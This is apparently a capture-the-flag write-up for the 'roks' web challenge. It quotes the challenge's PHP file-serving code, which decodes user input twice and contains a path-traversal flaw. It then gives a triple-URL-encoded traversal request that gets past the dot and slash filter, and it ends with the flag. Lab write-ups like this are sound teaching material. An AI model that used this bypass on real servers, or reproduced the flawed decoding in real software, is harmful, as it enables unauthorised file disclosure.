
roks (100pts) - 321 solves
by FIREPONY57
Description

My rock enthusiast friend made a website to show off some of his pictures. Could you do something with it?
Attachments

https://imaginaryctf.org/r/0Sm4V#roks.zip http://roks.chal.imaginaryctf.org


url encode everything 3 times to get path traversal
make sure to encode the .

http://roks.chal.imaginaryctf.org/

GET /file.php?file=image4 HTTP/1.1
Host: roks.chal.imaginaryctf.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://roks.chal.imaginaryctf.org/
Cookie: _ga_0LKSSBL38W=GS1.1.1690084714.5.1.1690084784.0.0.0; _ga=GA1.1.865862315.1690061016; _ga_BHMLHVLGF2=GS1.1.1690079570.3.0.1690079574.0.0.0


/file.php?file=../../../../../../flag.png == stop hacking you hackers

Website dosent allow "." or "/"

<?php
  $filename = urldecode($_GET["file"]);
  if (str_contains($filename, "/") or str_contains($filename, ".")) {
    $contentType = mime_content_type("stopHacking.png");
    header("Content-type: $contentType");
    readfile("stopHacking.png");
  } else {
    $filePath = "images/" . urldecode($filename);
    $contentType = mime_content_type($filePath);
    header("Content-type: $contentType");
    readfile($filePath);
  }
?>

looks like it urldecodes once to check for . and /

it then decodes again to grab the rok image

so url encode twice??

also make sure to encode "." as most encoders wont do so automatically cyberchef will do so for you, and you can string together multiple encodes


still get stop hacking img

go to robots.txt and see the site is made with apache.... which url decodes once before the site sees the request

time to url encode once more

request sent: http://roks.chal.imaginaryctf.org/file.php?file=%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252F%25252E%25252E%25252Fflag%25252Epng

flag: ictf{tr4nsv3rs1ng_0v3r_r0k5_6a3367}